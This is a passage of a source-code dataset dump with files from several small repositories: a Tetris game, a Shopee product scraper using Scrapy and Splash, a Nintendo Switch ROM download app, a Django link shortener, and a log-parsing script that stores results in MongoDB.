"text": "import numpy as np\nfrom display import Dp\n\nACTOR0 = np.array([[1], [1], [1], [1]])\nACTOR1 = np.array([[1, 1], [0, 1], [0, 1]])\nACTOR2 = np.array([[1, 1], [1, 0], [1, 0]])\nACTOR3 = np.array([[0, 1], [1, 1], [0, 1]])\nACTOR4 = np.array([[1, 0], [1, 1], [1, 0]])\nACTOR5 = np.array([[1, 1], [1, 1]])\nACTOR6 = np.array([[0, 1], [1, 1], [1, 0]])\nACTOR7 = np.array([[1, 0], [1, 1], [0, 1]])\nACTORS = [ACTOR0, ACTOR1, ACTOR2, ACTOR3, ACTOR4, ACTOR5, ACTOR6, ACTOR7]\n\nclass Actor:\n def __init__(self, dataset, x=0, y=0):\n self.__dataset = dataset \n self.x = x \n self.y = y\n\n def value(self):\n return self.__dataset\n\n def shape(self):\n return self.__dataset.shape\n\n def rotate(self, bg):\n dataset = np.rot90(self.__dataset)\n x = self.x\n y = self.y\n \n brow, bcol = bg.shape()\n row, col = dataset.shape \n if x + row > brow - 1 or y + col > bcol - 1:\n return -1 \n if self.overlap(bg, x, y):\n return -1 \n self.__dataset = dataset\n\n return 0 \n\n def left(self, bg):\n x = self.x\n y = self.y - 1 \n if y < 0:\n return -1 \n if self.overlap(bg, x, y):\n return -1 \n self.y = y\n return 0 \n\n def right(self, bg):\n x = self.x\n y = self.y + 1\n col = self.__dataset.shape[1]\n if y + col > bg.shape()[1]:\n return -1 \n if self.overlap(bg, x, y):\n return -1\n self.y = y\n return 0 \n\n def Down(self, bg):\n x = self.x + 1\n y = self.y\n row = self.__dataset.shape[0]\n if x + row > bg.shape()[0]:\n return -1 \n if self.overlap(bg, x, y):\n return -1\n self.x = x\n return 0 \n\n def overlap(self, bg, x, y):\n array = np.array(self.__dataset, copy=True)\n row, col = self.__dataset.shape\n for i in range(row):\n for j in range(col):\n array[i][j] = array[i][j] + bg.value()[x + i][y + j]\n if array[i][j] == 2:\n return True\n return False\n \n def get_img(self):\n dp = Dp(self.__dataset)\n return dp.get_img()\n\nif __name__ == '__main__':\n actor = Actor(ACTORS[7])\n print actor.value()\n print actor.shape()\n"
},
{
"alpha_fraction": 0.6322701573371887,
"alphanum_fraction": 0.6454033851623535,
"avg_line_length": 47.45454406738281,
"blob_id": "2d2b6ecc4643032d2d381d46f5c04ba0268bb343",
"content_id": "e5758312bd2badde505ee0736b7e37d98af6c7e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 534,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 11,
"path": "/README.md",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "# tetris \n##   1  prepare \n####      1.1 pip install --user numpy \n####      1.2 pip install --user opencv-python(if in mac os x, please install through another method)\n##   2  run\n####      python main.py\n##   3  control\n####      left arrow: move left\n####      right arrow: move right\n####      up arrow: rotate\n####      down arrow: move left accelerately\n"
}
] | 5 |
Khoan-IT/Scrapy-JS | https://github.com/Khoan-IT/Scrapy-JS | 2823b61784d573aee074e9ae65b7d7357f5aa2eb | eb76f08eb30776524caff0f232d29bc5d4f2d6be | 028272ddea77a3a2eca6b0c97cdcfb529211e32d | refs/heads/main | 2023-06-21T23:36:37.790537 | 2021-07-26T03:16:33 | 2021-07-26T03:16:33 | 389,493,435 | 0 | 0 | null | 2021-07-26T03:06:26 | 2021-07-26T03:16:35 | 2021-07-28T14:41:54 | Python | [
{
"alpha_fraction": 0.6812143921852112,
"alphanum_fraction": 0.6812143921852112,
"avg_line_length": 23,
"blob_id": "b54a18ba0ef05720627399dcf4460356e2094a68",
"content_id": "d9f0e838cc87f6c71f0186c20e42f344c1e285f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 527,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 22,
"path": "/demo_scrapy/items.py",
"repo_name": "Khoan-IT/Scrapy-JS",
"src_encoding": "UTF-8",
"text": "# Define here the models for your scraped items\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass DemoScrapyItem(scrapy.Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n product_name = scrapy.Field()\n price_sale =scrapy.Field()\n price = scrapy.Field()\n rate_average = scrapy.Field()\n\n\nclass ProductItem(scrapy.Item):\n name = scrapy.Field()\n price = scrapy.Field()\n price_sale = scrapy.Field()\n sold = scrapy.Field()"
},
{
"alpha_fraction": 0.495340496301651,
"alphanum_fraction": 0.5068100094795227,
"avg_line_length": 30.704545974731445,
"blob_id": "77b91e51a58b22805e01df942569c68b4201cc61",
"content_id": "f0c88cbdaafba4d7cd2cf5ec1c74dbf42f8f7db9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 44,
"path": "/demo_scrapy/spiders/shopee_crawl.py",
"repo_name": "Khoan-IT/Scrapy-JS",
"src_encoding": "UTF-8",
"text": "import scrapy\nfrom scrapy_splash import SplashRequest\nfrom demo_scrapy.items import ProductItem\n \nclass ShopeeCrawlSpider(scrapy.Spider):\n name = 'shopee_crawl'\n allowed_domains = ['shopee.vn']\n start_urls = ['https://shopee.vn/shop/88201679/search']\n \n render_script = \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(5))\n \n return {\n html = splash:html(),\n url = splash:url(),\n }\n end\n \"\"\" \n \n def start_requests(self):\n for url in self.start_urls:\n yield SplashRequest(\n url,\n self.parse, \n endpoint='render.html',\n args={\n 'wait': 5,\n 'lua_source': self.render_script,\n }\n )\n \n def parse(self, response):\n item = ProductItem()\n \n for product in response.css(\"div.shop-search-result-view__item\"):\n item[\"name\"] = product.css(\"div._36CEnF ::text\").extract_first()\n item[\"price\"] = product.css(\"div._3_-SiN ::text\").extract_first()\n item[\"price_sale\"] = product.css(\"span._29R_un ::text\").extract_first()\n item[\"sold\"] = product.css(\"div.go5yPW ::text\").extract_first()\n \n yield item "
},
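For the SplashRequest above to actually be routed through the Splash container from the README, scrapy-splash's settings have to be enabled in settings.py; a minimal sketch, using the middleware order values the scrapy-splash documentation gives (the localhost URL assumes the docker run -p 8050:8050 mapping):

```python
# settings.py additions for scrapy-splash
SPLASH_URL = 'http://localhost:8050'

DOWNLOADER_MIDDLEWARES = {
    'scrapy_splash.SplashCookiesMiddleware': 723,
    'scrapy_splash.SplashMiddleware': 725,
    'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,
}
SPIDER_MIDDLEWARES = {
    'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,
}
DUPEFILTER_CLASS = 'scrapy_splash.SplashAwareDupeFilter'
```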
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.737609326839447,
"avg_line_length": 37.11111068725586,
"blob_id": "a1960f665897422654e5981173af256036afd95f",
"content_id": "3623c3c58ca05e2fb18c985f5d1db70a64e77374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 9,
"path": "/README.md",
"repo_name": "Khoan-IT/Scrapy-JS",
"src_encoding": "UTF-8",
"text": "# Scrapy-JS\n# Sau khi cài Docker:\n + sudo docker pull scrapinghub/splash\n + sudo docker run -p 8050:8050 scrapinghub/splash\n# Thay đổi USER_AGENT:\n + Lấy USER_AGENT tại: https://www.whatismybrowser.com/detect/what-is-my-user-agent\n + Thay đổi USER_AGENT trong file settings.py\n# Crawl dữ liệu\n + scrapy crawl shopee_crawl -o product.json\n"
}
] | 3 |
hotshotz79/NX-RomGet | https://github.com/hotshotz79/NX-RomGet | d7ede6f923c9d9e42626fd0bfd26e6aebc484752 | d2206d34beadfe1fce8d6f3a3bcabe465615e176 | 04a8f5b21034186eeb87188d34f9417584df4f57 | refs/heads/master | 2022-07-04T18:59:37.340168 | 2020-05-15T17:12:15 | 2020-05-15T17:12:15 | 256,834,379 | 13 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7225573062896729,
"alphanum_fraction": 0.7285886406898499,
"avg_line_length": 27.586206436157227,
"blob_id": "e3e2c17bcbf199410fa3d10766448d20d78b03c0",
"content_id": "846906b046429ac08d5e98c44752a44d17fb0e6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 829,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 29,
"path": "/README.md",
"repo_name": "hotshotz79/NX-RomGet",
"src_encoding": "UTF-8",
"text": "# NX-RomGet\n\nDownload ROMs directly on the switch from user provided list (.txt)\n\nRequires: [PyNx](https://github.com/nx-python/Pynx)\n\n**Touch** support only\n\n# Guide:\n\n1. Download PyNx and extract to sdmc:/switch/PyNx\n2. Download NX-RomGet (main.py) and overwrite PyNx main.py\n3. Create txt files in the PyNx folder in the following way\n \n(a) File name will determine where to save ROMs\n Ex; \"Sega - Genesis.txt\" will save ROMs from that list under sdmc:/Roms/Sega - Genesis/\n \n(b) Each row will include name and download link separate by semi colon\n Ex; \"Sonic 3 (USA);http://link.com/Sonic3.zip\"\n \n **NOTE:** HTTPS link will give error, so try to rename to HTTP\n\n# Screenshots:\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.44915783405303955,
"alphanum_fraction": 0.469016432762146,
"avg_line_length": 32.974544525146484,
"blob_id": "6fbd289cb7f66d819dbfd69bc4ada6c7ed89815f",
"content_id": "c7a57cc670dc5d1dca1c6b2b593aaf32bba24741",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9618,
"license_type": "permissive",
"max_line_length": 215,
"num_lines": 275,
"path": "/main.py",
"repo_name": "hotshotz79/NX-RomGet",
"src_encoding": "UTF-8",
"text": "import imgui\r\nimport imguihelper\r\nimport os\r\nimport _nx\r\nimport runpy\r\nimport sys\r\nfrom imgui.integrations.nx import NXRenderer\r\nfrom nx.utils import clear_terminal\r\nimport time\r\nimport urllib.request\r\nimport urllib.parse\r\nimport zipfile\r\n\r\nsys.argv = [\"\"] # workaround needed for runpy\r\n\r\ndef colorToFloat(t):\r\n nt = ()\r\n for v in t:\r\n nt += ((1/255) * v, )\r\n return nt\r\n\r\n# (r, g, b)\r\nFOLDER_COLOR = colorToFloat((230, 126, 34))\r\nPYFILE_COLOR = colorToFloat((46, 204, 113))\r\nFILE_COLOR = colorToFloat((41, 128, 185))\r\nC_RED = (0.9, 0.0, 0.1)\r\nC_ORANGE = (0.9, 0.4, 0.0)\r\nC_YELLOW = (0.8, 0.9, 0.0)\r\nC_LIME = (0.5, 0.9, 0.0)\r\nC_GREEN = (0.0, 0.9, 0.2)\r\nC_AQUA = (0.0, 0.9, 0.6)\r\nC_BLUE = (0.0, 0.5, 0.9)\r\nC_NAVY = (0.2, 0.0, 0.9)\r\nC_PURPLE = (0.6, 0.0, 0.9)\r\nC_PINK = (0.9, 0.0, 0.8)\r\n\r\nTILED_DOUBLE = 1\r\n\r\n# Progress Bar---------------------------------------\r\ndef reporthook(count, block_size, total_size):\r\n global start_time\r\n if count == 0:\r\n start_time = time.time()\r\n return\r\n duration = time.time() - start_time\r\n progress_size = int(count * block_size)\r\n speed = int(progress_size / (1024 * duration))\r\n percent = min(int(count*block_size*100/total_size),100)\r\n sys.stdout.write(\"\\r...%d%%, %d / %d MB, %d KB/s, %d seconds passed\" %\r\n (percent, progress_size / (1024 * 1024), total_size / (1024 * 1024), speed, duration))\r\n #sys.stdout.write(\"\\rPercent: %d%% | Downloaded: %d of %d MB | Speed: %d KB/s | Elapsed Time: %d seconds\" %\r\n # (percent, progress_size / (1024 * 1024), total_size / (1024 * 1024), speed, duration))\r\n sys.stdout.flush()\r\n\r\n# Start Download-------------------------------------\r\ndef start(filename, url, consolefolder, extract):\r\n # clear both buffers\r\n imguihelper.clear()\r\n _nx.gfx_set_mode(TILED_DOUBLE)\r\n clear_terminal()\r\n \r\n full_file = urllib.parse.unquote(url.split('/')[-1])\r\n # zippath = filename + \".zip\"\r\n print(\"-------------------------------------------------------------------------------\")\r\n print(\"\\n _ _ __ __ ______ _____ _ \" +\r\n \"\\n | \\ | |\\ \\ / / | ___ \\ | __ \\ | | \" +\r\n \"\\n | \\| | \\ V /______| |_/ /___ _ __ ___ | | \\/ ___| |_ \" +\r\n \"\\n | . 
` | / \\______| // _ \\| '_ ` _ \\| | __ / _ \\ __|\" +\r\n \"\\n | |\\ |/ /^\\ \\ | |\\ \\ (_) | | | | | | |_\\ \\ __/ |_ \" +\r\n \"\\n \\_| \\_/\\/ \\/ \\_| \\_\\___/|_| |_| |_|\\____/\\___|\\__|\")\r\n print(\"\\n-------------------------------------------------------------------------------\\n\")\r\n print(\"\\n[Rom Selected] \" + filename)\r\n print(\"\\n[Download Path] sdmc:/Roms/\" + consolefolder + \"/\")\r\n print(\"\\n-------------------------------------------------------------------------------\\n\")\r\n print(\"Download Progress:\\n\")\r\n urllib.request.urlretrieve(url, \"sdmc:/Roms/\" + consolefolder + \"/\" + full_file, reporthook)\r\n print(\"\\n\\n File Downloaded\")\r\n \r\n # Extraction Section\r\n if full_file.endswith(\".zip\"):\r\n if extract:\r\n print(\"\\n-------------------------------------------------------------------------------\\n\")\r\n print(\"\\n[Extraction Path] sdmc:/Roms/\" + consolefolder + \"/\" + filename + \"/\")\r\n print(\"Extraction Progress:\\n\")\r\n path_to_extract = \"sdmc:/Roms/\" + consolefolder + \"/\" + filename\r\n zf = zipfile.ZipFile(\"sdmc:/Roms/\" + consolefolder + \"/\" + zippath)\r\n uncompress_size = sum((file.file_size for file in zf.infolist()))\r\n extracted_size = 0\r\n\r\n i = len(zf.infolist())\r\n x = 1\r\n\r\n for file in zf.infolist():\r\n extracted_size += file.file_size\r\n print(\"Extracting \" + str(x) + \" of \" + str(i) + \": \" + file.filename + \" | Size: \" + str(file.file_size / 1000000)[0:5] + \" MB | Progress: \" + str((extracted_size * 100/uncompress_size))[0:3] + \"%\")\r\n zf.extractall(path_to_extract)\r\n x += 1\r\n\r\n imguihelper.initialize()\r\n\r\n# DISPLAY ROMS---------------------------------------\r\ndef romList(console_selected):\r\n # clear both buffers\r\n imguihelper.clear()\r\n _nx.gfx_set_mode(TILED_DOUBLE)\r\n clear_terminal()\r\n imguihelper.initialize()\r\n \r\n renderer = NXRenderer()\r\n checkbox_extract = False\r\n \r\n while True:\r\n renderer.handleinputs()\r\n\r\n imgui.new_frame()\r\n\r\n width, height = renderer.io.display_size\r\n imgui.set_next_window_size(width, height)\r\n imgui.set_next_window_position(0, 0)\r\n imgui.begin(\"\",\r\n flags=imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_NO_RESIZE | imgui.WINDOW_NO_MOVE | imgui.WINDOW_NO_SAVED_SETTINGS\r\n )\r\n imgui.set_window_font_scale(1.2)\r\n imgui.text(console_selected.upper())\r\n \r\n # TODO\r\n # ADD Checkbox for \"Delete ZIP after Extract\"\r\n \r\n # Create Selected Systems Directory\r\n directory = console_selected\r\n parent_dir = \"sdmc:/Roms\"\r\n path = os.path.join(parent_dir, directory)\r\n try:\r\n os.makedirs(path, exist_ok = True)\r\n except OSError as error:\r\n print(\"Directory '%s' can not be created\" % directory)\r\n \r\n button_number = 0\r\n imgui.separator()\r\n imgui.new_line()\r\n \r\n # Go Back\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *FOLDER_COLOR)\r\n if imgui.button(\"GO BACK\", width=288, height=60):\r\n main()\r\n imgui.pop_style_color(1)\r\n \r\n # Checkbox for Extracting\r\n imgui.same_line(spacing=50)\r\n _, checkbox_extract = imgui.checkbox(\"EXTRACT .ZIP AFTER DOWNLOAD\", checkbox_extract)\r\n \r\n imgui.new_line()\r\n \r\n imgui.separator()\r\n \r\n firstRow = True;\r\n txtFile = console_selected + \".txt\"\r\n file = open(txtFile,\"r\")\r\n \r\n # Generate button for each record found\r\n for line in file:\r\n fields = line.split(\";\")\r\n title = fields[0]\r\n link = fields[1]\r\n \r\n if button_number == 4:\r\n imgui.new_line()\r\n button_number = 0\r\n else:\r\n 
imgui.same_line()\r\n \r\n if firstRow == True:\r\n imgui.new_line()\r\n firstRow = False\r\n \r\n imgui.push_style_color(imgui.COLOR_BUTTON, *FILE_COLOR)\r\n if imgui.button(title.upper(), width=288, height=60):\r\n start(title, link, console_selected, checkbox_extract)\r\n \r\n imgui.pop_style_color(1)\r\n \r\n button_number += 1\r\n\r\n file.close()\r\n\r\n imgui.end()\r\n\r\n imgui.render()\r\n renderer.render()\r\n\r\n renderer.shutdown()\r\n \r\n\r\n# MAIN-----------------------------------------------\r\ndef main():\r\n renderer = NXRenderer()\r\n currentDir = os.getcwd()\r\n\r\n while True:\r\n renderer.handleinputs()\r\n\r\n imgui.new_frame()\r\n\r\n width, height = renderer.io.display_size\r\n imgui.set_next_window_size(width, height)\r\n imgui.set_next_window_position(0, 0)\r\n imgui.begin(\"\",\r\n flags=imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_NO_RESIZE | imgui.WINDOW_NO_MOVE | imgui.WINDOW_NO_SAVED_SETTINGS\r\n )\r\n imgui.set_window_font_scale(2.0)\r\n imgui.text(\"NX-RomGet (ver 0.1)\")\r\n \r\n # Create ROMS folder if it doesnt exist\r\n directory = \"Roms\"\r\n parent_dir = \"sdmc:/\"\r\n path = os.path.join(parent_dir, directory)\r\n try:\r\n os.makedirs(path, exist_ok = True)\r\n except OSError as error:\r\n print(\"Directory '%s' can not be created\" % directory)\r\n \r\n # ------------- COLORS -------------\r\n # C_RED | C_ORANGE | C_YELLOW | C_LIME | C_GREEN\r\n # C_AQUA | C_BLUE | C_NAVY | C_PURPLE |C_PINK\r\n \r\n # Check which Console Files exist (.txt)\r\n console_files = []\r\n for e in os.listdir():\r\n if e.endswith(\".txt\"):\r\n console_files.append(e.replace(\".txt\", \"\"))\r\n console_files = sorted(console_files)\r\n \r\n btn_number = 0\r\n starting_row = True;\r\n \r\n # Generate buttons for each Console File found\r\n for e in console_files:\r\n \r\n if btn_number == 3:\r\n imgui.new_line()\r\n btn_number = 0\r\n else:\r\n imgui.same_line()\r\n \r\n if starting_row == True:\r\n imgui.new_line()\r\n starting_row = False\r\n \r\n if e.startswith(\"Nintendo\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_RED)\r\n elif e.startswith(\"Sega\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_NAVY)\r\n elif e.startswith(\"Sony\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_PURPLE)\r\n elif e.startswith(\"Final\"):\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_GREEN)\r\n else:\r\n imgui.push_style_color(imgui.COLOR_BUTTON, *C_ORANGE)\r\n if imgui.button(e, width=390, height=150):\r\n romList(e) \r\n imgui.pop_style_color(1)\r\n \r\n btn_number += 1\r\n \r\n #------------------------------\r\n \r\n imgui.end()\r\n\r\n imgui.render()\r\n renderer.render()\r\n\r\n renderer.shutdown()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n"
}
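One bug worth flagging in the main.py record above: the extraction branch opens zipfile.ZipFile(... + zippath), but the line zippath = filename + ".zip" is commented out, so extracting any .zip raises NameError. Since the download is saved under full_file, a minimal patch is to open that same name:

```python
# the archive was saved as full_file a few lines earlier, so reuse it here
zf = zipfile.ZipFile("sdmc:/Roms/" + consolefolder + "/" + full_file)
```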
] | 2 |
AmbassadorCR/leenks | https://github.com/AmbassadorCR/leenks | 3a432b459523f44c7a40ec4e4d855c8bb297b328 | 246bb714d8c3428779ce8b4ee41d4093833fa123 | 236fa996299b8af3758338dc7ce805cd9fc7dce8 | refs/heads/master | 2021-01-02T09:20:27.012867 | 2013-11-21T09:37:13 | 2013-11-21T09:37:13 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7482014298439026,
"alphanum_fraction": 0.7769784331321716,
"avg_line_length": 26.799999237060547,
"blob_id": "2a6c318e316341dd6725d0a38581fd1bfab4431b",
"content_id": "5dba19192524b9c64f2961d2217305c23f4dfcfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 5,
"path": "/links/models.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Link(models.Model):\n\ttitle = models.CharField(max_length=200)\n\tclicks = models.IntegerField(default=0)\n"
},
{
"alpha_fraction": 0.4898523986339569,
"alphanum_fraction": 0.4898523986339569,
"avg_line_length": 29.08333396911621,
"blob_id": "cd85debb5f73c1aad11aa8b8b19ed326284a1537",
"content_id": "df1e79456cca7ce2a2ebbc4a25cc52f2623297e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 36,
"path": "/TBLeenks/static/js/LinksController.js",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": " function LinksListCtrl($scope, $http) {\n $scope.newLink = {title: ''};\n $scope.listLinks = function() {\n $http({method: 'GET', url: '/links/'}).\n success(function(data, status, headers, config) {\n $scope.links = data.results; \n $scope.view = './partials/list.html'; \n })\n };\n\n $scope.delete = function(id){\n $http({method: 'DELETE', url: '/links/'+id}).\n success(function(data, status, headers, config) {\n $scope.listLinks();\n })\n };\n \n\n $scope.edit = function(link){\n $http.put('/links/'+link.id, link).\n success(function(data, status, headers, config) {\n $scope.listLinks();\n })\n };\n\n $scope.create = function(){\n $http.post('/links/', $scope.newLink).\n success(function(data, status, headers, config) {\n $scope.listLinks();\n })\n }\n\n $scope.view = './partials/list.html'; \n $scope.listLinks();\n }\n LinksListCtrl.$inject = ['$scope', '$http'];"
},
{
"alpha_fraction": 0.7361853718757629,
"alphanum_fraction": 0.7504456043243408,
"avg_line_length": 26.700000762939453,
"blob_id": "07ec30a1e087e44d27985d3d0bd2c4d0234da66c",
"content_id": "1c8a11f0f0dbef40c8c59aeac5d10909a5933848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 20,
"path": "/links/views.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from links.models import Link\nfrom rest_framework import viewsets\nfrom links.serializers import LinkSerializer\nfrom django.shortcuts import redirect\nfrom django.http import Http404 \n\nclass LinkViewSet(viewsets.ModelViewSet):\n queryset = Link.objects.all()\n serializer_class = LinkSerializer\n\ndef redirectView(request):\n\tlinkQuery = Link.objects.filter(title=request.path[3:])\n\n\tif linkQuery.exists():\n\t\tlink = linkQuery.first();\n\t\tlink.clicks += 1;\n\t\tlink.save();\n\t\treturn redirect('/static/Leenks.html?link=' + link.title)\n\telse:\n\t\traise Http404\n\n\t\n\n\t\n\n"
},
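redirectView above does a read-modify-write on clicks (fetch, += 1, save), which can lose counts when two requests race; Django's F() expressions push the increment into a single UPDATE. A sketch of the same view with an atomic counter (behavior otherwise unchanged):

```python
from django.db.models import F
from django.http import Http404
from django.shortcuts import redirect

from links.models import Link

def redirectView(request):
    title = request.path[3:]  # strip the '/r/' prefix, as in the original
    # update() issues one UPDATE ... SET clicks = clicks + 1 and returns the row count
    updated = Link.objects.filter(title=title).update(clicks=F('clicks') + 1)
    if updated:
        return redirect('/static/Leenks.html?link=' + title)
    raise Http404
```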
{
"alpha_fraction": 0.751968502998352,
"alphanum_fraction": 0.751968502998352,
"avg_line_length": 24.299999237060547,
"blob_id": "f3d0d127db9fe35ef6a5a1bb57b1c679c8db34de",
"content_id": "c8f6bc2842de11092c0b302e3d348febf817ab37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 20,
"path": "/TBLeenks/urls.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\nfrom rest_framework import routers\nfrom django.contrib import admin\nfrom links import views\n\n\nadmin.autodiscover()\n\nrouter = routers.SimpleRouter()\nrouter.register(r'links', views.LinkViewSet)\n\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include(router.urls)),\n url(r'^r/', views.redirectView)\n)\n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nurlpatterns += staticfiles_urlpatterns()\n\n\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 29.399999618530273,
"blob_id": "95dd56c525dc53b682d2d49d2a271cce2e4a2218",
"content_id": "5ab18848a43a23f76b0716aa89f30f070db3dd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/links/serializers.py",
"repo_name": "AmbassadorCR/leenks",
"src_encoding": "UTF-8",
"text": "from links.models import Link\nfrom rest_framework import serializers\n\nclass LinkSerializer(serializers.HyperlinkedModelSerializer):\n num_clicks = serializers.Field(source='clicks')\n \n class Meta:\n model = Link\n fields = ['id', 'title', 'num_clicks']\n read_only_fields = ['id']\n"
}
] | 5 |
Octoberr/linuxdatacollect | https://github.com/Octoberr/linuxdatacollect | 58bb97e2e126925b2be92bf66ad7b0c4c997c3d6 | 9c77f7dc886bfcba8e31bfc5b37985581bf70063 | 0f06e80fd7c9c95b4cbb5035db8d3ac140fcb10e | refs/heads/master | 2021-05-10T07:59:49.653769 | 2018-04-20T01:21:02 | 2018-04-20T01:21:02 | 118,869,649 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.524483323097229,
"alphanum_fraction": 0.5378886461257935,
"avg_line_length": 29.17977523803711,
"blob_id": "97427915d26a1633e6d3e4c59ff798ec5401d0a2",
"content_id": "8675cb438ddf27c50e6b439576914be052dcbc4b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5647,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 178,
"path": "/pubfunc/getthezengze.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n正则表达式匹配测试\ncreate by SWM\n2017/12/29\nincrease mongoquery interface\n2018/01/04\n\"\"\"\nimport re\nimport json\nimport datetime\nimport pymongo\nfrom config import mongo\nimport os\nimport time\nfileDir = os.path.dirname(os.path.realpath(__file__))\n\n\n# 获得一个文件夹下所有可读文件的列表\n# def getallthefilename(directorypath):\n# allfilenames = []\n# for root, dirs, files in os.walk(directorypath):\n# for filename in files:\n# # print(filename)\n# allfilenames.append(filename)\n# return allfilenames\n\n\n# mongodb数据库localhost,集合terminal\ndef insertintoterminal(spiderdata):\n client = pymongo.MongoClient(host=mongo['host'], port=mongo['port'])\n db = client.swmdb\n information = db.terminal\n information.insert(spiderdata)\n print(datetime.datetime.now(), 'insert terminal success')\n\n\n# mongodb数据库localhost,集合wifi\n# def insertintowifi(spiderdata):\n# client = pymongo.MongoClient(host=mongo['host'], port=mongo['port'])\n# db = client.swmdb\n# information = db.wifi\n# information.insert(spiderdata)\n# print(datetime.datetime.now(), 'insert wifi success')\n\n\n# def selectsomething(arg1, arg2, arg3, arg4):\n# client = pymongo.MongoClient(host=mongo['host'], port=mongo['port'])\n# db = client.swmdb\n# information = db.saveoutfile\n# # 迭代器\n# cursor = information.find({\"arg\": arg1}, {\"arg\": 1}).sort(\"arg\", -1).limit(1)\n# while True:\n# data = next(cursor)\n# if something:\n# return data\n # for el in cursor:\n # havedate = datetime.datetime.strptime(el[\"Info\"]['Date'], \"%Y-%m-%dT%H:%M:%S\").date()\n # return havedate\n\n\ndef getthephoneinformation(filepath):\n # re_connect = re.compile(r'AP-STA-CONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n # re_disconnect = re.compile(r'AP-STA-DISCONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n\n #匹配当前时间\n re_time = re.compile(r'(\\S{3}) (\\d{2})\\, (\\d{4}) (\\d{2})\\:(\\d{2})\\:(\\d{2})')\n # re_time = re.compile(r'\\d{4}.\\d{2}\\:\\d{2}\\:\\d{2}')\n # 匹配具有标识的字符串,如abc=****;\n # re_usragen = re.compile(r'User-Agent=\\S+;') # User-Agent=(.*?);\n # re_usragen = re.compile(r'User-Agent=(.*?);') # User-Agent=(.*?);\n # 匹配qq邮箱\n # re_mailcount = re.compile(r'[\\d]+@[\\w.]+')\n # 匹配qq号,数字9位到13位\n # re_qqnumber = re.compile(r'\\d{9,10}')\n # 匹配ip地址\n # re_ipnumber = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n # 匹配mac地址\n # re_mac = re.compile(r'\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+')\n # 匹配gif图片\n # [\\w.]+[\\d.]\\.gif 字母加数字\n # re_gif = re.compile(r'[\\S.]+\\.gif')\n # 匹配网站\n # re_net = re.compile(r'[\\w.]+\\.com|[\\w.]+\\.cn')\n file = open(filepath, \"r\").readlines()\n for line in file:\n fac = re_time.match(line)\n print fac.group(3)\n break\n # with open(filepath, \"r\") as file:\n # lines = file.read()\n # fac = re_time.findall(file)\n # print fac\n conf = {}\n conf['Jan'] = 1\n conf['Feb'] = 2\n conf['Mar'] = 3\n conf['Apr'] = 4\n conf['May'] = 5\n conf['Jun'] = 6\n conf['Jul'] = 7\n conf['Aug'] = 8\n conf['Sep'] = 